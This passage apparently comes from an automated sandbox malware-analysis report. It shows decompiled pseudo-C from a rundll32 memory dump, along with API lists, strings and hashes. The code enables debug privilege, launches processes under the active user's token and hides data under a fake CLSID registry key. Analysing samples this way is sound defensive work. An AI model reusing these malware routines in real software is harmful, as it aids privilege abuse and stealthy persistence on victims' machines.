                                                            					if(_t54 != 0) {
                                                            						_push(_t54);
                                                            						_t105 = L04655B55(_t91, _t107, _t118);
                                                            						_t111 = _t110 + 4;
                                                            						if(_t105 != 0) {
                                                            							if(GetFileVersionInfoW(_v540, _v552, _v548, _t105) != 0 && VerQueryValueW(_t105, L"\\VarFileInfo\\Translation",  &_v544,  &_v536) != 0) {
                                                            								_t88 = ( *_v544 & 0x0000ffff) << 0x00000010 |  *(_v544 + 2) & 0x0000ffff;
                                                            								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\FileDescription", _t88);
                                                            								_t113 = _t111 + 0xc;
                                                            								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                            									_t96 = _v532;
                                                            									_t102 = _v556 - _t96;
                                                            									do {
                                                            										_t83 =  *_t96 & 0x0000ffff;
                                                            										_t96 =  &(_t96[1]);
                                                            										 *(_t102 + _t96 - 2) = _t83;
                                                            									} while (_t83 != 0);
                                                            								}
                                                            								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\CompanyName", _t88);
                                                            								_t114 = _t113 + 0xc;
                                                            								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                            									_t95 = _v532;
                                                            									_t100 = _v560 - _t95;
                                                            									asm("o16 nop [eax+eax]");
                                                            									do {
                                                            										_t82 =  *_t95 & 0x0000ffff;
                                                            										_t95 =  &(_t95[1]);
                                                            										 *(_t100 + _t95 - 2) = _t82;
                                                            									} while (_t82 != 0);
                                                            								}
                                                            								wsprintfW( &_v528, L"\\StringFileInfo\\%08lx\\ProductVersion", _t88);
                                                            								_t111 = _t114 + 0xc;
                                                            								if(VerQueryValueW(_t105,  &_v528,  &_v532,  &_v536) != 0) {
                                                            									_t94 = _v532;
                                                            									_t108 = _t107 - _t94;
                                                            									do {
                                                            										_t81 =  *_t94 & 0x0000ffff;
                                                            										_t94 =  &(_t94[1]);
                                                            										 *(_t108 + _t94 - 2) = _t81;
                                                            									} while (_t81 != 0);
                                                            								}
                                                            							}
                                                            							L04655B0F(_t105);
                                                            						}
                                                            					}
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t109);
                                                            			}









































                                                            0x04645dd0
                                                            0x04645dd9
                                                            0x04645de0
                                                            0x04645de3
                                                            0x04645dea
                                                            0x04645df0
                                                            0x04645df3
                                                            0x04645df5
                                                            0x04645dfa
                                                            0x04645e00
                                                            0x04645e03
                                                            0x04645e05
                                                            0x04645e0a
                                                            0x04645e10
                                                            0x04645e16
                                                            0x04645e20
                                                            0x04645e20
                                                            0x04645e23
                                                            0x04645e26
                                                            0x04645e2b
                                                            0x04645e2d
                                                            0x04645e2f
                                                            0x04645e42
                                                            0x04645e48
                                                            0x04645e4e
                                                            0x04645e50
                                                            0x04645e56
                                                            0x04645e5c
                                                            0x04645e5e
                                                            0x04645e63
                                                            0x04645e84
                                                            0x04645ebc
                                                            0x04645ecb
                                                            0x04645ed1
                                                            0x04645ef2
                                                            0x04645efa
                                                            0x04645f00
                                                            0x04645f02
                                                            0x04645f02
                                                            0x04645f05
                                                            0x04645f08
                                                            0x04645f0d
                                                            0x04645f02
                                                            0x04645f1f
                                                            0x04645f25
                                                            0x04645f46
                                                            0x04645f4e
                                                            0x04645f54
                                                            0x04645f56
                                                            0x04645f60
                                                            0x04645f60
                                                            0x04645f63
                                                            0x04645f66
                                                            0x04645f6b
                                                            0x04645f60
                                                            0x04645f7d
                                                            0x04645f83
                                                            0x04645fa4
                                                            0x04645fa6
                                                            0x04645fac
                                                            0x04645fb0
                                                            0x04645fb0
                                                            0x04645fb3
                                                            0x04645fb6
                                                            0x04645fbb
                                                            0x04645fb0
                                                            0x04645fc0
                                                            0x04645fc3
                                                            0x04645fc8
                                                            0x04645e63
                                                            0x04645e50
                                                            0x04645fdd

                                                            APIs
                                                            Strings
                                                            • \VarFileInfo\Translation, xrefs: 04645E98
                                                            • \StringFileInfo\%08lx\CompanyName, xrefs: 04645F19
                                                            • \StringFileInfo\%08lx\FileDescription, xrefs: 04645EC5
                                                            • \StringFileInfo\%08lx\ProductVersion, xrefs: 04645F77
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: wsprintf
                                                            • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                            • API String ID: 2111968516-2104189134
                                                            • Opcode ID: 71b16a20fcedc23c822aed5944a96e249de33e76bc2f9ca31a19967433b060a9
                                                            • Instruction ID: 27c69e597404e014d88970bac92e3b969cbbea7a4d0b9188ab589361e2f91ebe
                                                            • Opcode Fuzzy Hash: 71b16a20fcedc23c822aed5944a96e249de33e76bc2f9ca31a19967433b060a9
                                                            • Instruction Fuzzy Hash: C3517175540219ABCB15DFA4DC88AEAB7B8FF54304F1441EAE909D7240FB35AE85CF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 53%
                                                            			E046472E0(void* __ebx, intOrPtr __edx, void* __eflags, WCHAR* _a8, struct _PROCESS_INFORMATION* _a20) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				struct _STARTUPINFOW _v80;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HINSTANCE__* _t26;
                                                            				_Unknown_base(*)()* _t27;
                                                            				void* _t29;
                                                            				void* _t34;
                                                            				long _t36;
                                                            				intOrPtr _t37;
                                                            				void* _t38;
                                                            
                                                            				_t36 = 0;
                                                            				_t37 = __edx;
                                                            				E0465DEA0(0,  &(_v80.lpReserved), 0, 0x40);
                                                            				_v80.cb = 0x44;
                                                            				_v80.lpDesktop = _t37;
                                                            				_v8 = 0;
                                                            				if(L0464ABF0() != 2) {
                                                            					return CreateProcessW(0, _a8, 0, 0, 0, 0, 0, 0,  &_v80, _a20);
                                                            				} else {
                                                            					_t38 = E046470E0(__ebx, 0, _t37);
                                                            					if(_t38 != 0) {
                                                            						_v12 = 0;
                                                            						_t26 = LoadLibraryA("Wtsapi32.dll");
                                                            						if(_t26 != 0) {
                                                            							_t27 = GetProcAddress(_t26, "WTSQueryUserToken");
                                                            							if(_t27 != 0) {
                                                            								_push( &_v12);
                                                            								_push(_t38);
                                                            								if( *_t27() != 0) {
                                                            									_t29 =  &_v8;
                                                            									__imp__CreateEnvironmentBlock(_t29, _v12, 0);
                                                            									if(_t29 != 0) {
                                                            										_t29 = _v8;
                                                            										_t36 = 0x400;
                                                            									} else {
                                                            										_v8 = _t29;
                                                            									}
                                                            									CreateProcessAsUserW(_v12, 0, _a8, 0, 0, 0, _t36, _t29, 0,  &_v80, _a20);
                                                            									_t34 = _v8;
                                                            									if(_t34 != 0) {
                                                            										__imp__DestroyEnvironmentBlock(_t34);
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					return 0;
                                                            				}
                                                            			}















                                                            0x046472ea
                                                            0x046472f1
                                                            0x046472f3
                                                            0x046472fb
                                                            0x04647302
                                                            0x04647305
                                                            0x04647310
                                                            0x046473c5
                                                            0x04647316
                                                            0x0464731b
                                                            0x0464731f
                                                            0x04647326
                                                            0x04647329
                                                            0x04647331
                                                            0x04647339
                                                            0x04647341
                                                            0x04647346
                                                            0x04647347
                                                            0x0464734c
                                                            0x04647352
                                                            0x04647356
                                                            0x0464735e
                                                            0x04647365
                                                            0x04647368
                                                            0x04647360
                                                            0x04647360
                                                            0x04647360
                                                            0x04647386
                                                            0x0464738c
                                                            0x04647391
                                                            0x04647394
                                                            0x04647394
                                                            0x04647391
                                                            0x0464734c
                                                            0x04647341
                                                            0x04647331
                                                            0x046473a1
                                                            0x046473a1

                                                            APIs
                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                            • CreateProcessW.KERNEL32(00000000,04636938,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 046473BA
                                                              • Part of subcall function 046470E0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0464711D
                                                              • Part of subcall function 046470E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04647135
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 04647329
                                                            • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647339
                                                            • CreateProcessAsUserW.ADVAPI32(?,00000000,04636938,00000000,00000000,00000000,00000400,?,00000000,00000044,?), ref: 04647386
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateLibraryLoadProcess$AddressAllocateCheckFreeInitializeMembershipProcTokenUserVersion
                                                            • String ID: D$WTSQueryUserToken$Wtsapi32.dll
                                                            • API String ID: 903725173-1631787044
                                                            • Opcode ID: 817f3789bb8c758b0d7adf15922d3e84fabf7a8e5ae7ecc28eb57bfe9a9e7b2b
                                                            • Instruction ID: 243e4adf8e15fb67bcbc93cddc80553d579c55c7d362cd6f01d9ce3df5487fdc
                                                            • Opcode Fuzzy Hash: 817f3789bb8c758b0d7adf15922d3e84fabf7a8e5ae7ecc28eb57bfe9a9e7b2b
                                                            • Instruction Fuzzy Hash: 8B21B571A40209FBEF219FA1DC09FAE7B78EB94B11F100069F908E6240FB30A901CB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04646DF0(intOrPtr* __ecx, char __edx) {
                                                            				void* _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				void* _t17;
                                                            				long _t18;
                                                            				char _t25;
                                                            				void* _t30;
                                                            				char* _t31;
                                                            				char* _t35;
                                                            				char* _t36;
                                                            				intOrPtr* _t40;
                                                            
                                                            				_t36 = __ecx;
                                                            				_v12 = __edx;
                                                            				if(__ecx == 0) {
                                                            					return _t17;
                                                            				}
                                                            				_t40 = __ecx;
                                                            				_t30 = __ecx + 2;
                                                            				asm("o16 nop [eax+eax]");
                                                            				do {
                                                            					_t18 =  *_t40;
                                                            					_t40 = _t40 + 2;
                                                            				} while (_t18 != 0);
                                                            				if(_t40 - _t30 >> 1 < 1) {
                                                            					L11:
                                                            					return _t18;
                                                            				}
                                                            				_v8 = 0;
                                                            				if(RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0) != 0) {
                                                            					L9:
                                                            					_v16 = _v12;
                                                            					_v8 = 0;
                                                            					_t18 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Classes\\CLSID\\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}", 0, 0, 0, 0xf013f, 0,  &_v8, 0);
                                                            					if(_t18 == 0) {
                                                            						RegSetValueExW(_v8, "2", 0, 4,  &_v16, 4);
                                                            						_t18 = RegCloseKey(_v8);
                                                            					}
                                                            					goto L11;
                                                            				}
                                                            				_t31 = _t36;
                                                            				_t35 =  &(_t31[2]);
                                                            				do {
                                                            					_t25 =  *_t31;
                                                            					_t31 =  &(_t31[2]);
                                                            				} while (_t25 != 0);
                                                            				RegSetValueExW(_v8, "1", 0, 1, _t36, 2 + (_t31 - _t35 >> 1) * 2);
                                                            				RegCloseKey(_v8);
                                                            				goto L9;
                                                            			}














                                                            0x04646df7
                                                            0x04646df9
                                                            0x04646dfe
                                                            0x04646eef
                                                            0x04646eef
                                                            0x04646e05
                                                            0x04646e07
                                                            0x04646e0a
                                                            0x04646e10
                                                            0x04646e10
                                                            0x04646e13
                                                            0x04646e16
                                                            0x04646e22
                                                            0x04646eea
                                                            0x00000000
                                                            0x04646eea
                                                            0x04646e4b
                                                            0x04646e56
                                                            0x04646e9d
                                                            0x04646ea2
                                                            0x04646ec0
                                                            0x04646ec7
                                                            0x04646ecb
                                                            0x04646edf
                                                            0x04646ee8
                                                            0x04646ee8
                                                            0x00000000
                                                            0x04646ecb
                                                            0x04646e58
                                                            0x04646e5a
                                                            0x04646e60
                                                            0x04646e60
                                                            0x04646e63
                                                            0x04646e66
                                                            0x04646e84
                                                            0x04646e93
                                                            0x00000000

                                                            APIs
                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,0464C359,00000000,00000000,00000000), ref: 04646E52
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E09C,00000000,00000001,?,00000000), ref: 04646E84
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 04646E93
                                                            • RegCreateKeyExW.ADVAPI32(80000002,SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC},00000000,00000000,00000000,000F013F,00000000,00000000,00000000), ref: 04646EC7
                                                            • RegSetValueExW.ADVAPI32(00000000,0467E124,00000000,00000004,?,00000004), ref: 04646EDF
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 04646EE8
                                                            Strings
                                                            • SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}, xrefs: 04646E41, 04646EB6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue
                                                            • String ID: SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                                                            • API String ID: 1818849710-2030040551
                                                            • Opcode ID: 13064f6a7157ac8cf672da0a58e15786e3bb9d93b208ec2b86d8a5830c05c109
                                                            • Instruction ID: 42a66d627b69b17b098087df7427cc1684f03daf1e82748871b8f119fd8b619f
                                                            • Opcode Fuzzy Hash: 13064f6a7157ac8cf672da0a58e15786e3bb9d93b208ec2b86d8a5830c05c109
                                                            • Instruction Fuzzy Hash: CB21B175A44208FBEF249B94DC06FADB7B8EB85B00F200159FA057B290E7B57A01DB54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0463A980(void* __ebx, void* __ecx, void* __eflags, char* _a4, int _a8) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				void* _v612;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				signed int _t23;
                                                            				int _t31;
                                                            				struct _CRITICAL_SECTION* _t39;
                                                            				char* _t45;
                                                            				void* _t56;
                                                            				int _t58;
                                                            				void* _t61;
                                                            				void* _t64;
                                                            				signed int _t71;
                                                            
                                                            				_t69 = _t71;
                                                            				_t23 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t23 ^ _t71;
                                                            				_t45 = _a4;
                                                            				_push(_t61);
                                                            				_t56 = __ecx;
                                                            				E04646050(_t45, L"Global",  &_v88, __ecx, _t61);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v612 = 0;
                                                            				_t31 = RegCreateKeyExW(0x80000002,  &_v608, 0, 0, 0, 0xf013f, 0,  &_v612, 0);
                                                            				if(_t31 != 0) {
                                                            					L2:
                                                            					return E04655AFE(_v8 ^ _t69);
                                                            				} else {
                                                            					RegSetValueExW(_v612, "1", _t31, 3, _t45, _a8);
                                                            					_t64 =  ==  ? 1 : 0;
                                                            					RegCloseKey(_v612);
                                                            					if(_t64 != 0) {
                                                            						CreateEventA(0, 1, 0, _t56 + 0xc);
                                                            						E0465F4A8(0);
                                                            						asm("int3");
                                                            						asm("int3");
                                                            						_push(_t56);
                                                            						_t58 = 1;
                                                            						 *1 = 0x467df78;
                                                            						if( *0x00000025 == 0) {
                                                            							L10:
                                                            							_t39 = _t58 + 0x28;
                                                            							DeleteCriticalSection(_t39);
                                                            							return _t39;
                                                            						} else {
                                                            							_push(_t64);
                                                            							EnterCriticalSection(0x29);
                                                            							if( *0x00000025 != 0) {
                                                            								_t52 =  *0x00000041;
                                                            								 *0x00000025 = 0;
                                                            								if( *0x00000041 != 0) {
                                                            									E0464FE10(_t52, 0x29);
                                                            									 *0x00000041 = 0;
                                                            								}
                                                            								LeaveCriticalSection(0x29);
                                                            								 *((intOrPtr*)( *_t58 + 4))();
                                                            								goto L10;
                                                            							} else {
                                                            								LeaveCriticalSection(0x29);
                                                            								DeleteCriticalSection(0x29);
                                                            								return 0x29;
                                                            							}
                                                            						}
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            			}


















                                                            0x0463a981
                                                            0x0463a989
                                                            0x0463a990
                                                            0x0463a994
                                                            0x0463a99a
                                                            0x0463a99c
                                                            0x0463a9a3
                                                            0x0463a9b8
                                                            0x0463a9c9
                                                            0x0463a9e6
                                                            0x0463a9ee
                                                            0x0463aa22
                                                            0x0463aa34
                                                            0x0463a9f0
                                                            0x0463aa02
                                                            0x0463aa15
                                                            0x0463aa18
                                                            0x0463aa20
                                                            0x0463aa41
                                                            0x0463aa49
                                                            0x0463aa4e
                                                            0x0463aa4f
                                                            0x0463aa50
                                                            0x0463aa51
                                                            0x0463aa57
                                                            0x0463aa5d
                                                            0x0463aaad
                                                            0x0463aaad
                                                            0x0463aab1
                                                            0x0463aab8
                                                            0x0463aa5f
                                                            0x0463aa5f
                                                            0x0463aa64
                                                            0x0463aa6e
                                                            0x0463aa84
                                                            0x0463aa87
                                                            0x0463aa90
                                                            0x0463aa92
                                                            0x0463aa97
                                                            0x0463aa97
                                                            0x0463aa9f
                                                            0x0463aaa9
                                                            0x00000000
                                                            0x0463aa70
                                                            0x0463aa71
                                                            0x0463aa7c
                                                            0x0463aa83
                                                            0x0463aa83
                                                            0x0463aa6e
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0463aa20

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463A9B8
                                                            • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 0463A9E6
                                                            • RegSetValueExW.ADVAPI32(?,0467E09C,00000000,00000003,?,?), ref: 0463AA02
                                                            • RegCloseKey.ADVAPI32(?), ref: 0463AA18
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0463AA41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue$EventOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2801368686-1865207932
                                                            • Opcode ID: f6f8b503b7f7a3ca192a4b784072aa78f9eccde0830bdd5d86e101933dbf09b4
                                                            • Instruction ID: 548635b789f588c769d7e74022cc8a3441d7419e409730144ca7af0d96abbd08
                                                            • Opcode Fuzzy Hash: f6f8b503b7f7a3ca192a4b784072aa78f9eccde0830bdd5d86e101933dbf09b4
                                                            • Instruction Fuzzy Hash: B6218E31A0521CBBDB249FA1DC8DFABBB6CEF44711F004059BA09E6141FA756E04DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E04647240(WCHAR* __ecx, long* __edx, void* __eflags) {
                                                            				void* _v8;
                                                            				intOrPtr _v12;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				struct HINSTANCE__* _t11;
                                                            				_Unknown_base(*)()* _t12;
                                                            				void* _t13;
                                                            				WCHAR* _t16;
                                                            				intOrPtr* _t21;
                                                            				void* _t22;
                                                            
                                                            				_t21 = __edx;
                                                            				_t16 = __ecx;
                                                            				_t22 = 0;
                                                            				if(L0464ABF0() != 2) {
                                                            					 *_t21 = GetEnvironmentVariableW(L"USERPROFILE", _t16,  *__edx);
                                                            					_t22 =  !=  ? 1 : 0;
                                                            					goto L6;
                                                            				} else {
                                                            					_v12 = E046470E0(_t16, __edx, 0);
                                                            					_v8 = 0;
                                                            					_t11 = LoadLibraryA("Wtsapi32.dll");
                                                            					if(_t11 == 0) {
                                                            						L6:
                                                            						return _t22;
                                                            					} else {
                                                            						_t12 = GetProcAddress(_t11, "WTSQueryUserToken");
                                                            						if(_t12 == 0) {
                                                            							goto L6;
                                                            						} else {
                                                            							_t13 =  *_t12(_v12,  &_v8);
                                                            							if(_t13 == 0) {
                                                            								goto L6;
                                                            							} else {
                                                            								__imp__GetUserProfileDirectoryW(_v8, _t16, _t21);
                                                            								CloseHandle(_v8);
                                                            								return _t13;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}














                                                            0x04647249
                                                            0x0464724b
                                                            0x0464724d
                                                            0x04647257
                                                            0x046472bf
                                                            0x046472c6
                                                            0x00000000
                                                            0x04647259
                                                            0x04647263
                                                            0x04647266
                                                            0x04647269
                                                            0x04647271
                                                            0x046472ca
                                                            0x046472d1
                                                            0x04647273
                                                            0x04647279
                                                            0x04647281
                                                            0x00000000
                                                            0x04647283
                                                            0x0464728a
                                                            0x0464728e
                                                            0x00000000
                                                            0x04647290
                                                            0x04647295
                                                            0x046472a0
                                                            0x046472ae
                                                            0x046472ae
                                                            0x0464728e
                                                            0x04647281
                                                            0x04647271

                                                            APIs
                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
                                                              • Part of subcall function 0464ABF0: FreeSid.ADVAPI32(?), ref: 0464AC4A
                                                            • GetEnvironmentVariableW.KERNEL32(USERPROFILE,?,00000104,?,?,?,046368B1), ref: 046472B7
                                                              • Part of subcall function 046470E0: GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0464711D
                                                              • Part of subcall function 046470E0: LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04647135
                                                            • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,?,?,046368B1), ref: 04647269
                                                            • GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 04647279
                                                            • CloseHandle.KERNEL32(?,?,?,?,046368B1), ref: 046472A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LibraryLoad$AddressAllocateCheckCloseEnvironmentFreeHandleInitializeMembershipProcTokenVariableVersion
                                                            • String ID: USERPROFILE$WTSQueryUserToken$Wtsapi32.dll
                                                            • API String ID: 4195895698-4029724716
                                                            • Opcode ID: 562ae5710b5fa37e180789c6bb318e3eaee42143ef0d3c5261aed30a19b19ae3
                                                            • Instruction ID: 63d1f763840b014d329eeabedb64a5fbc52c467b586adf6444e1fe21b57d257d
                                                            • Opcode Fuzzy Hash: 562ae5710b5fa37e180789c6bb318e3eaee42143ef0d3c5261aed30a19b19ae3
                                                            • Instruction Fuzzy Hash: 7D019631700219BF9F145FE9AC4995EFBA9EF946A2B100065F808D2210FB759D509B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 61%
                                                            			E04645D40(void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				void _v32;
                                                            				signed int _t6;
                                                            				_Unknown_base(*)()* _t11;
                                                            				void* _t23;
                                                            				signed int _t30;
                                                            
                                                            				_t32 = (_t30 & 0xfffffff8) - 0x20;
                                                            				_t6 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t6 ^ (_t30 & 0xfffffff8) - 0x00000020;
                                                            				_t23 = OpenProcess(0x400, 0, GetCurrentProcessId());
                                                            				if(_t23 != 0) {
                                                            					_t11 = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtQueryInformationProcess");
                                                            					if(_t11 != 0) {
                                                            						 *_t11(_t23, 0,  &_v32, 0x18, 0);
                                                            						_t27 =  ==  ? _v32 : 0;
                                                            					}
                                                            					CloseHandle(_t23);
                                                            					return E04655AFE(_v8 ^ _t32);
                                                            				} else {
                                                            					return E04655AFE(_v8 ^ _t32);
                                                            				}
                                                            			}









                                                            0x04645d46
                                                            0x04645d49
                                                            0x04645d50
                                                            0x04645d6b
                                                            0x04645d6f
                                                            0x04645d93
                                                            0x04645d9b
                                                            0x04645da9
                                                            0x04645dad
                                                            0x04645dad
                                                            0x04645db3
                                                            0x04645dcb
                                                            0x04645d71
                                                            0x04645d81
                                                            0x04645d81

                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D58
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D65
                                                            • GetModuleHandleW.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645D8C
                                                            • GetProcAddress.KERNEL32(00000000), ref: 04645D93
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04646FEC,00000000,74CB4DC0), ref: 04645DB3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: HandleProcess$AddressCloseCurrentModuleOpenProc
                                                            • String ID: NtQueryInformationProcess$ntdll
                                                            • API String ID: 2704359807-2585995557
                                                            • Opcode ID: a6e4f3fe3ea4b0eb1684fa1c67d0bd6d2805250c7d7c811732019b3d3f12fd71
                                                            • Instruction ID: 2c0f5f3e98ae59056362f71d7127f6cc8bed9d20e55fa6346efa3d056905f78e
                                                            • Opcode Fuzzy Hash: a6e4f3fe3ea4b0eb1684fa1c67d0bd6d2805250c7d7c811732019b3d3f12fd71
                                                            • Instruction Fuzzy Hash: B301B5323003116FD714AFA9AC4EB7B77A8EFC8A25F00011DFE1AD7180FE64A9008796
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 38%
                                                            			E046441C0(void* __ebx, char _a4) {
                                                            				void* __ecx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				char _t7;
                                                            				_Unknown_base(*)()* _t10;
                                                            				int _t14;
                                                            				void* _t18;
                                                            				char* _t19;
                                                            				void* _t21;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            				intOrPtr* _t24;
                                                            
                                                            				_t18 = __ebx;
                                                            				_t7 = _a4;
                                                            				_t24 = _t19;
                                                            				 *_t24 = 0x467e8b0;
                                                            				 *((intOrPtr*)(_t24 + 4)) = _t7;
                                                            				 *((intOrPtr*)(_t7 + 0x38)) = _t24;
                                                            				 *((intOrPtr*)(_t24 + 8)) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t24 = 0x467ee4c;
                                                            				_t10 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
                                                            				if(_t10 == 0) {
                                                            					E0464AD30(_t24);
                                                            				} else {
                                                            					_t19 =  &_a4;
                                                            					 *_t10(0x14, 1, 0, _t19);
                                                            				}
                                                            				_t23 = E04644C00(_t18, _t21, _t22, _t24);
                                                            				if(_t23 != 0) {
                                                            					_t14 = LocalSize(_t23);
                                                            					_push(_t19);
                                                            					_t6 = _t24 + 4; // 0x0
                                                            					_push(0x3f);
